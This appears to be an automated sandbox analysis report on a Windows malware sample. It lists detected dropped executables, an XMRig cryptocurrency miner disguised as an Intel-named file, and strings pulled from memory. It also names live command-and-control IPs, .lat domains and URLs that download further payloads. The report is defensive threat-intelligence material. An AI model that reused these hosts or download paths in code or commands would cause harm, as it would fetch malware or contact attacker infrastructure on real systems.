Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1018751001\0a99277d48.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_5d8799c9-a

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: 39.3.Intel_PTT_EK_Recertification.exe.2804f500000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.3.Intel_PTT_EK_Recertification.exe.2804f500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000028.00000002.3026870349.0000000000847000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.3026870349.000000000086B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.3027829379.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.3028044780.000000014040B000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.3026870349.0000000000895000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Intel_PTT_EK_Recertification.exe PID: 6896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 6432, type: MEMORYSTR

Found strings related to Crypto-Mining

Source: Intel_PTT_EK_Recertification.exe, 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: Intel_PTT_EK_Recertification.exe, 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: cryptonight/0
Source: Intel_PTT_EK_Recertification.exe, 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: Intel_PTT_EK_Recertification.exe, 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe

Directory queried: number of queries: 1001

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 20_2_00977978 FindFirstFileW,FindFirstFileW,free,

20_2_00977978

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 20_2_0097881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,

20_2_0097881C

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\main\extracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\main\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor	URLs: energyaffai.lat
Source: Malware configuration extractor	URLs: rapeflowwj.lat
Source: Malware configuration extractor	URLs: aspecteirs.lat
Source: Malware configuration extractor	URLs: sweepyribs.lat
Source: Malware configuration extractor	URLs: necklacebudi.lat
Source: Malware configuration extractor	URLs: sustainskelet.lat
Source: Malware configuration extractor	URLs: discokeyus.lat
Source: Malware configuration extractor	URLs: crosshuaht.lat
Source: Malware configuration extractor	URLs: grannyejh.lat
Source: Malware configuration extractor	IPs: 185.215.113.43

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 185.121.15.192 185.121.15.192

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00B2E0C0 recv,recv,recv,recv,

0_2_00B2E0C0

Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.css
Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.jpg
Source: d5cd5e4aa8.exe, 0000002E.00000002.4041357716.00000000055E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/add?substr=mixtwo&s=three&sub=empNK
Source: d5cd5e4aa8.exe, 0000002E.00000002.4041357716.00000000055E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/add?substr=mixtwo&s=three&sub=empaK
Source: d5cd5e4aa8.exe, 0000002E.00000002.4018413567.0000000000F54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/dll/download
Source: d5cd5e4aa8.exe, 0000002E.00000002.4018413567.0000000000F54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/dll/download)%N
Source: d5cd5e4aa8.exe, 0000002E.00000002.4041357716.00000000055E0000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3718296864.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3780362783.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/dll/key
Source: d5cd5e4aa8.exe, 0000002E.00000002.4041357716.00000000055E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/dll/keybnZ
Source: d5cd5e4aa8.exe, 0000002E.00000003.3608285796.00000000056D2000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3780362783.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/download
Source: d5cd5e4aa8.exe, 0000002E.00000003.3718296864.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3780362783.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/download(ho
Source: d5cd5e4aa8.exe, 0000002E.00000003.3718296864.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3780362783.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/download.hi
Source: d5cd5e4aa8.exe, 0000002E.00000002.4018413567.0000000000F54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/download=%Z
Source: d5cd5e4aa8.exe, 0000002E.00000002.4041645751.000000000567C000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3864020294.000000000595C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/soft/download
Source: d5cd5e4aa8.exe, 0000002E.00000003.3864248822.000000000595C000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3864020294.000000000595C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/soft/download&%
Source: d5cd5e4aa8.exe, 0000002E.00000002.4018413567.0000000000F54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/soft/downloadI$.
Source: ea17d0b77a.exe, 0000002F.00000003.3627075029.00000000010F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: ea17d0b77a.exe, 0000002F.00000003.3627075029.00000000010F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/VB
Source: ea17d0b77a.exe, 0000002F.00000003.3627075029.00000000010F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/aMoh
Source: 9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: 9434b989db.exe, 00000030.00000002.4214117571.00000000007A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exeT
Source: ea17d0b77a.exe, 0000002F.00000003.3627075029.00000000010F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: ea17d0b77a.exe, 0000002F.00000003.3627075029.0000000001108000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeJ
Source: ea17d0b77a.exe, 0000002F.00000003.3627075029.00000000010F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: ea17d0b77a.exe, 0000002F.00000003.3627075029.00000000010F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe:
Source: 9434b989db.exe, 00000030.00000002.4214117571.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000002.4222202528.0000000000FA4000.00000040.00000001.01000000.00000013.sdmp, 9434b989db.exe, 00000030.00000002.4222202528.0000000000FEC000.00000040.00000001.01000000.00000013.sdmp	String found in binary or memory: http://185.215.113.206
Source: 9434b989db.exe, 00000030.00000002.4214117571.00000000007B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: 9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
Source: 9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: 9434b989db.exe, 00000030.00000002.4214117571.00000000007B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: 9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
Source: 9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll5G
Source: 9434b989db.exe, 00000030.00000002.4214117571.00000000007B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: 9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: 9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000000FA4000.00000040.00000001.01000000.00000013.sdmp, 9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000002.4214117571.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000002.4222202528.0000000000FEC000.00000040.00000001.01000000.00000013.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000000FEC000.00000040.00000001.01000000.00000013.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpecee80c0ba92f6f38a0bad9769dfExtension
Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000000FA4000.00000040.00000001.01000000.00000013.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpge
Source: 9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpx
Source: 9434b989db.exe, 00000030.00000002.4214117571.00000000007B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/dq
Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000000FEC000.00000040.00000001.01000000.00000013.sdmp	String found in binary or memory: http://185.215.113.206c4becf79229cb002.phpge
Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000000FA4000.00000040.00000001.01000000.00000013.sdmp	String found in binary or memory: http://185.215.113.206ta
Source: ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: ea17d0b77a.exe, 0000002F.00000003.3503997226.00000000010DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro8
Source: ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: c359af6492.exe.14.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: c359af6492.exe.14.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: c359af6492.exe.14.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: c359af6492.exe.14.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850
Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: c359af6492.exe.14.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: c359af6492.exe, 00000010.00000000.2914213620.0000000000423000.00000002.00000001.01000000.0000000B.sdmp, c359af6492.exe.14.dr	String found in binary or memory: http://usbtor.ru/viewtopic.php?t=798)Z
Source: d5cd5e4aa8.exe, 0000002E.00000003.3864248822.000000000585D000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3868146778.000000000595F000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3864248822.000000000595C000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3868658111.00000000059A2000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3869728348.000000000595F000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3863773219.000000000569F000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3869516834.0000000005A31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: ea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: ea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: ea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/hsts.html
Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: ea17d0b77a.exe, 0000002F.00000003.3355323768.0000000005987000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3356315250.0000000005999000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3387431025.000000000599A000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3538247582.000000000599D000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3537566773.00000000010F6000.00000004.00000020.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3355441716.000000000598F000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3355493240.0000000005997000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3504377940.000000000599C000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3533335417.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3504078369.0000000005990000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3539294349.0000000001072000.00000004.00000020.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3471828382.00000000010F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/
Source: ea17d0b77a.exe, 0000002F.00000003.3539294349.0000000001072000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/=G
Source: ea17d0b77a.exe, 0000002F.00000003.3387431025.000000000599A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/P
Source: ea17d0b77a.exe, 0000002F.00000003.3474594016.0000000005990000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3421003760.000000000598C000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3355323768.0000000005987000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3539294349.000000000108C000.00000004.00000020.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3387431025.000000000599A000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3387431025.000000000598C000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3355441716.000000000598F000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3504377940.000000000599C000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3464019441.000000000598C000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3464019441.0000000005990000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3474594016.0000000005989000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3421454526.000000000598F000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3504078369.0000000005990000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3314582270.0000000005989000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3533335417.000000000598C000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3390597746.000000000598F000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3358345765.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3422664576.0000000005996000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3537566773.0000000001108000.00000004.00000020.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3396433955.0000000005992000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/api
Source: ea17d0b77a.exe, 0000002F.00000003.3355323768.0000000005987000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/apiqqqqqq
Source: ea17d0b77a.exe, 0000002F.00000003.3537566773.00000000010F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/jBpk9
Source: ea17d0b77a.exe, 0000002F.00000003.3475247118.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat:443/api
Source: ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
